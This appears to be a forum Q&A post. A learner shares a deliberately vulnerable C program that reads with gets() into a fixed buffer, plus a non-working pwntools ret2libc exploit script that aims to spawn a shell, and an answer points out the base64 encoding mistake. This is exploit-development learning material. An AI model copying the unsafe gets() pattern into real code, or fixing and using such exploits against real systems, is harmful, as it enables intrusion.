# Having problem in Buffer Overflow(ret2libc) exploit

Tags: c, buffer, buffer-overflow

I was following a tutorial regarding `bufferoverflow(ret2libc)` attack and it failed due to unknown reasons. The C program I wrote is as follows:

```
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <stdlib.h>

int main(int argc, char** argv)
{
        char buf[256];
        gets(buf);
        return 0;
}
```

and i compiled it so it so it has checksec as:

```
Arch:     amd64-64-little
RELRO:    Partial RELRO
Stack:    No canary found
NX:       NX enabled
PIE:      No PIE (0x400000)
```

and the exploit i have written is:

```
from pwn import *

proc = process("./vuln")
junk = "A"*264
libc_base =      0x00007ffff7dee000
system_offset =  0x0000000000048df0
exec_offset =    0x00000000000cb7c0
exit_offset =    0x000000000003e600
binsh_offset =   0x18a156
system = str(base64.b64encode(p64(libc_base + system_offset)))
exit   = str(base64.b64encode(p64(libc_base + exit_offset)))
binsh  = str(base64.b64encode(p64(libc_base + binsh_offset)))
pop_rdi = str(base64.b64encode(p64(0x00000000004011bb)))

buf = junk + pop_rdi + binsh + system + exit
proc.sendline(buf)
proc.interactive()
```

But immediately after running the exploit it is giving me an error:

```
[+] Starting local process './vuln': pid 1595
[*] Switching to interactive mode
[*] Got EOF while reading in interactive
$ 
[*] Process './vuln' stopped with exit code -11 (SIGSEGV) (pid 1595)
[*] Got EOF while sending in interactive
```

Can someone please tell me what is the problem here, Thanks in advance.

Answer (score 1):

Using `base64.b64encode` here is bad because it will encode the addresses and hide them from the machine that executes the code.

I didn't check well and there may be other errors, but the first thing to do is removing them and pass the machine the addresses of the parts.

Comment: by removing base64.b64encode the code does not compile and gives me an error:                   can only concatenate str(not bytes) to str